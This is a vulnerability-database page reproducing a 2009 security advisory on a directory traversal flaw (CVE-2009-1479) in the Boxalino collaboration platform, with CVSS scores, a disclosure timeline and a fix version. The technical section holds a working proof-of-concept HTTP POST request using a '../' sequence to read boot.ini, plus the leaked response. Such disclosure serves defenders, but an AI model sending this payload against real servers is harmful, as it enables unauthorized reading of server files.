Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Boxalino - Directory Traversal Vulnerability
2009-10-22 / 2009-10-23
Credit:
Axel Neumann
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2009-1479
CWE:
CWE-22
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
############################################################# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # ############################################################# # # Product: Boxalino # Vendor: Boxalino AG (www.boxalino.com) # CVD ID: CVE-2009-1479 # Subject: Directory Traversal Vulnerabilities # Risk: High # Effect: Remotely exploitable # Author: Axel Neumann <axel.neumann (at) csnc (dot) ch [email concealed]> # Date: 2009-10-20 # ############################################################# Introduction ------------ An Directory Traversal vulnerability exists in the collaboration platform Boxalino [1]. Remote exploitation of a directory traversal vulnerability in Boxalino's product allows attackers to read arbitrary files on the server file system with web server privileges. Affected -------- Vulnerable: * Boxalino (closed-source product) Not vulnerable: * Unknown Not tested: * N/A Technical Description --------------------- When handling HTTP requests, Boxalino does not properly check for directory traversal specifiers. Therefore, by including a sequence such as "../../../", an attacker is able to read files outside of the intended location. The vulnerability exists for both, Windows and UNIX based systems. POST /boxalino/client/desktop/default.htm HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 Host: www.example.ch Content-Length: 256 Cookie: JSESSIONID=A57AABD5F2051C4333F500EBB1232295 Connection: Close Pragma: no-cache url=../../../../../../../../boot.ini&login_loginName=example&login_login Password=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_l ogon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Expires: Tues, 01 Jan 1980 00:00:00 GMT Content-Type: text/html Content-Length: 208 Date: Wed, 29 Apr 2009 09:01:06 GMT Connection: close [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect Workaround / Fix ---------------- Update to Boxalino Version 09.05.25-0421 Timeline -------- 2009-10-20: Advisory Release 2009-05-26: Release of fixed Boxalino Version / Patch 2009-05-25: Initial vendor response 2009-04-30: Initial vendor notification 2009-04-29: Assigned CVE-2009-1479 2009-04-29: Discovery by Axel Neumann References ---------- [1] http://www.boxalino.com/
Referencje:
http://www.securityfocus.com/archive/1/archive/1/507319/100/0/threaded
http://www.csnc.ch/misc/files/advisories/CVE-2009-1479-Boxalino-Directory_Traversal.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top